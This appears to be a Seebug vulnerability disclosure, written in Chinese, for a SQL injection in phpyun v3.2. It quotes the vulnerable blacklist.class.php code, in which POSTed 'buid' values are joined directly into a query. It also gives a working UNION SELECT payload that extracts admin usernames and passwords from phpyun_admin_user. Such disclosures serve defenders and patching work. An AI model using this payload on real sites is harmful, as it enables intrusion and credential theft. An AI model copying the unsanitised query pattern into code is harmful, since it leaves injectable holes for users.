phpyun v3.2 (20141222) 前台注入 #5

2014-12-26T00:00:00
ID SSV:93952
Type seebug
Reporter Root
Modified 2014-12-26T00:00:00

Description

简要描述:

目测最后一发。

详细说明:

在member/model/blacklist.class.php中

`` function save_action(){ if(is_array($_POST['buid'])&&$_POST['buid']){ $company=$this->obj->DB_select_all("company","uidin(".@implode(',',$_POST['buid']).")","uid,name`");//直接整合成字符串后 带入查询 没有经过自带的pylode处理 或者 intval 和单引号 导致了注入

        foreach($company as $val){
            $this->obj->insert_into("blacklist",array('p_uid'=>$val['uid'],'c_uid'=>$this->uid,"inputtime"=>time(),'usertype'=>'1','com_name'=>$val['name']));
        }

```

http://web/web/phpyun32/member/index.php/admin/?c=blacklist&act=save buid[]=1) and 1=2 union select 1,concat(username,0x23,password) from phpyun_admin_user limit 1#&safekey=f213ae15d14ba9de59934fdf6e3eb70f

漏洞证明:

<img src="https://images.seebug.org/upload/201412/251305196d3ffbee57a14367b088a563b1d478d5.jpg" alt="p22.jpg" width="600" onerror="javascript:errimg(this);">

demo测试成功了。。 太卡了 图片都传不上来擦擦擦。